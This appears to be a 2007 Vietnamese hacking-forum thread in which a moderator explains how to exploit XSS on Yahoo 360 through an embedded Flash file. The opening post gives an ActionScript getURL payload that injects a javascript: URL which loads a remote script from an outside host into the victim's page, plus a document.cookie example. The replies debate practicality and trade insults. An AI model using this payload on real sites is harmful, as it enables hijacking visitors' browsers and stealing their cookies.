Khai thác XSS qua Flash - Hạ đo ván Yahoo 360

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận thâm nhập

Khai thác XSS qua Flash - Hạ đo ván Yahoo 360

[Question] Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	27/04/2007 08:25:41 (+0700) \| #1 \| 55986

xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline

Kĩ thuật khai thác XSS qua Flash

Không rõ là trước NoHat có ai chơi nó chưa, nhưng cái này là do NoHat mò ra.

Flash là một công cụ tạo hoạt hình số một trên thế giới hiện nay, đặc điểm khiến nó trở nên mạnh mẽ như vậy là nhờ nó có chức năng nhúng một dạng Script đặc biệt trong tập tin Flash ( .SWF ) được gọi là Action Script mã Script này hoàn toàn ko dính dáng gì tới JavaScript hết á.

Javascript là mã kịch bản chạy Phía Client, nó là mục tiêu của những hacker tìm cách khai thác lỗi XSS ( Cross Site Scripting )

Bản thân Flash không chạy được JavaScript, vậy nên bạn sẽ cho là tôi khùng khi bảo tôi sẽ chạy JavaScript thông qua Flash.

Sự thật là tôi hoàn toàn có thể chạy một doạn script trên bất kì trình duyệt nào, dù nó đang mở bất kì trang nào, đó là nhờ kĩ thuật JavaScript Injection - Kĩ thuật chèn script lên address bar

vd cụ thể:

Bạn nhập vào address bar dòng sau

Code:

javascript:alert(document.cookie);

Một hộp thoại văng ra với nội dung là cái cookie của HVA lưu trên máy bạn

Với ý tưởng này tôi sẽ làm cho cái Flash thực hiện công việc ghi dòng này lên address bar

Chú ý để hiểu những gì sau đây bạn phải tìm hiểu về Flash và ActionScript còn ko thì bạn 100% ko hiểu gì hết.

Trong Flash có hàm getURL()

hàm này thực hiện việc gửi 1 chuỗi địa chỉ tới thanh address ( có thể nói là như vậy ) rồi thực hiện việc truy cập địa chỉ này.

Bạn tạo 1 file flash với action script sau:

Code:

getURL("")

sau khi chạy thì chắc chắn cái trang web đang chứa đoạn flash sẽ wwwect sang trang chủ HVA

Cơ bản vấn đề là thế, giờ ta xem làm đc gì với thứ này.

Quay lại vấn đề Javascript Injection , ta sẽ sử dụng hàm getURL của flash gửi dòng javascript: tới thanh address và thực hiện nó một cách tự động.

Có thể tóm tắt tất cả như sau:

Một trang web cho phép chèn Flash ví dụ như Yahoo 360
smilie

ta chèn một tệp flash có hàm getURL để chạy lệnh javascript trực tiếp khi đoạn Flash đc load.

người dùng truy cập vô ----> Tệp Flash SWF đc load -------> chạy hàm getURL() -----> inject javascript: vô thanh address ----> chạy lệnh script đó ---------> đã khai thác được XSS )

Để cho mọi việc hoàn hảo hơn nữa, việc inject javascript lên address bar rất hạn chế số lượng lệnh, vì dài quá dễ sinh lỗi và ko được có kí tự enter không thì nó ko chạy vì address có cái kí tự enter bao giờ smilie

(
Cách giải quyết là dùng DOM load javascript vô trang luôn, cái này gọi là Dynamic JavaScript Loading

Sau đây là các mã demo cho toàn bộ quá trình khai thác XSS qua Flash

Mã ActionScript:

Code:

getURL("javascript:function include_dom(script_filename) {var html_doc = document.getElementsByTagName('head').item(0);var js = document.createElement('script');js.setAttribute('language', 'javascript');js.setAttribute('type', 'text/javascript');js.setAttribute('src', script_filename);html_doc.appendChild(js);}include_dom('http://hackernohat.googlepages.com/malenh.js');")

stop();

đoạn mã này là đoạn mã inject javascript vô address bar bạn chú ý dòng getURL nó chèn một đoạn mã javascript dùng DOM để chèn tệp tin script ( ở đây là tệp tin malenh.js đặt trên trang hackernohat.googlepages.com ) từ xa vào trang web chứa tệp Flash

Tệp malenh.js

Code:

alert('XSS Thought Flash Vulnerability');

tập tin malenh.js là tập tin chứa các mã script mà hacker sẽ chạy trên trình duyệt của nạn nhận.

Toàn bộ 2 têp : tệp flash và tệp malenh.js upload lên một máy chủ web ví dụ googlepages.com

vô trang cho phép chèn Flash như là Yahoo 360 chẳng hạn, dán đoạn mã load tệp Flash vô rùi ok xong phim .

Qua kĩ thuật khai thác này ta có thể thấy, Flash thật ra rất nguy hiểm khi người ta không nghĩ rằng có thể dùng nó cho mục đích phá hoại.

Copyright (C) NoHat smilie

)

iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline

[Question] Re: Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	27/04/2007 12:15:46 (+0700) \| #2 \| 56015

rcrackvn
Elite Member

Joined: 27/03/2007 02:04:05
Messages: 42
Offline

một điều đơn giản là bạn chỉ có thể post đc html tag trên chính blog của mình, chứ không thể comment blog người khác với html code đc để mà embed đc cái flash của bạn vào. Vậy hóa ra bạn phải bảo người ta vào xem blog của mình. Điều này cũng giống như việc bạn xây dựng 1 website với malicious content và bảo người ta vào visit, k0 phải người nào cũng vào. Thứ 2 là blog của bạn chứ không phải của người ta, nên ai security-concerned 1 tí sẽ không allow flash chạy đâu bạn.

[Question] Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	27/04/2007 12:35:47 (+0700) \| #3 \| 56017

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

Chuyện dụ vào , rất bình thường trên internet. Đâu ai đi dụ dân chuyên nghiệp vào.

3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...

[Question] Re: Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	27/04/2007 12:41:18 (+0700) \| #4 \| 56018

114v
Member

Joined: 08/07/2006 23:27:00
Messages: 191
Offline

Lỗi này nguy hiểm thật, kiểu này thì site nào có lưu cookie và cho post nội dung chắc die hết quá smilie

-))

[Question] Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	28/04/2007 10:34:22 (+0700) \| #5 \| 56129

xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline

Đã bảo là ví dụ với Yahoo 360 mừ còn dùng sao còn phải do cái đầu nữa chứ ?

iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline

[Question] Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	28/04/2007 11:02:53 (+0700) \| #6 \| 56134

minhquan1712
Member

Joined: 07/09/2006 16:17:25
Messages: 240
Offline

Không rõ là trước NoHat có ai chơi nó chưa, nhưng cái này là do NoHat mò ra.

cái này có chắc bạn tự tìm ra ko?
mình đã đọc được trong securityfocus 1 lần rồi nhưng bằng tiếng anh ^_^

[Question] Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	29/04/2007 07:25:14 (+0700) \| #7 \| 56268

xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline

Thì thế tui mới nói là "ko biết"

iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline

[Question] Re: Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	30/04/2007 06:06:06 (+0700) \| #8 \| 56370

vippro123
Locked

Joined: 22/03/2007 18:15:50
Messages: 111
Location: HuẾ MộNg mơ
Offline

anh này đúng là cao thủ

[Question] Re: Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	05/05/2007 07:29:16 (+0700) \| #9 \| 57205

watchd0g
Member

Joined: 30/11/2006 18:05:23
Messages: 42
Offline

túm lại yahoo 360 bị XSS chỗ nào mí bro?

[Question] Re: Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	05/05/2007 12:03:31 (+0700) \| #10 \| 57252

PhuDaiSu
Member

Joined: 21/04/2007 23:24:42
Messages: 20
Location: Thiếu Lâm Tự
Offline

Quả là đáng đồng tiền bát gạo. smilie

[Question] Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	07/05/2007 03:40:14 (+0700) \| #11 \| 57514

114v
Member

Joined: 08/07/2006 23:27:00
Messages: 191
Offline

hackernohat wrote:

Thì thế tui mới nói là "ko biết"

Vậy cái Copyright (C) NoHat là cái gì smilie

Mà hình như cái này chỉ hoạt động nếu flash đó đặt trên Yahoo, nếu đặt host khác thì nó không chạy được.

[Question] Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	07/05/2007 05:17:34 (+0700) \| #12 \| 57520

xnohat
Moderator

Joined: 30/01/2005 13:59:19
Messages: 1210
Location: /dev/null
Offline

114v wrote:

hackernohat wrote:

Thì thế tui mới nói là "ko biết"

Vậy cái Copyright (C) NoHat là cái gì

Mà hình như cái này chỉ hoạt động nếu flash đó đặt trên Yahoo, nếu đặt host khác thì nó không chạy được.

Khổ quá có mỗi chồ này cũng phải reply cho bằng đc.

Tui Copyright (C) cho bài viết của mình.

Còn bạn thích buộc tội hay gì khác thì tùy bạn.

iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: http://www.facebook.com/hvaonline

[Question] Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	10/05/2007 10:24:28 (+0700) \| #13 \| 58161

PhuDaiSu
Member

Joined: 21/04/2007 23:24:42
Messages: 20
Location: Thiếu Lâm Tự
Offline

114v wrote:

Mà hình như cái này chỉ hoạt động nếu flash đó đặt trên Yahoo, nếu đặt host khác thì nó không chạy được.

Ủa, flash chạy trên client thì lên quan gì đến host?

[Question] Khai thác XSS qua Flash - Hạ đo ván Yahoo 360	01/06/2007 11:25:36 (+0700) \| #14 \| 62676

vanha2005
Member

Joined: 30/01/2005 13:24:15
Messages: 2
Offline

PhuDaiSu wrote:

114v wrote:

Mà hình như cái này chỉ hoạt động nếu flash đó đặt trên Yahoo, nếu đặt host khác thì nó không chạy được.

Ủa, flash chạy trên client thì lên quan gì đến host?

Mấy thằng ngu đọc có hiểu gì đâu, bày đặt lượn đi cho nước nó trong.Ghét nhất kẻ không biết mà làm như vẻ ta đây.Toàn là spam bài cả.
PS admin: nếu thấy bài này mang tính spam thì có thể del ngay lập tức nhưng mà ghét mấy thằng đần này quá đi mất

Go to:

Users currently in here
1 Anonymous